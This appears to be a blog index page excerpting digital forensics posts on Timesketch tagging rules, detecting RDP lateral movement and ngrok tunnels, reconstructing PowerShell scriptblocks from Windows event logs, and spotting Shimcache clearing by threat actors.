During the COVID19 lockdown period, I spent time creating a rule set to get the most of Google’s Timesketch tagging feature. The tagging rules were mapped to MITRE ATT&CK where applicable. Timesketch has the ability to automatically run analyzers (i.e. Tagger, Sigma Rules etc) after a plaso file gets indexed.

Remote Desktop Protocol (T1021.001) continues to be one of the most favoured lateral movement techniques used by adversaries. This writeup up attempts to provide a consolidated view of the key indicators of RDP usage and potential additional host configuration changes that could take place. Firewall Use: Identifies Windows firewall rule activity…

FireEye’s blogpost about MAZE group identifies the use of RDP over Ngrok service as an alternative C2 channel. This article describes potential hunts which can be used to detect ngrok activity. Please note that this article is limited to observations related to the Windows OS. What is Ngrok? Ngrok (a service much loved…

Microsoft-Windows-PowerShell%4Operational.evtx can be used to uncover malicious script usage during DFIR investigations. The Scriptblock text located within EID 4104 (Execute a Remote Command) often has code that may aid you to piece together threat actions. The full Scriptblock for malicious payloads are often distributed over multiple events. I have come across incidents where the malicious payload was reconstructed using Scriptblock data. However, this becomes very cumbersome to do using Event Viewer.

A cleanup routine that can be performed by threat actors to flush the Shimcache to remove traces of their malicious activities. Shimcache aka AppCompatCache is a high valued artefact used for forensic analysis during cyber breaches. It holds records to detect evidence of execution or even existence of PEs. Latest…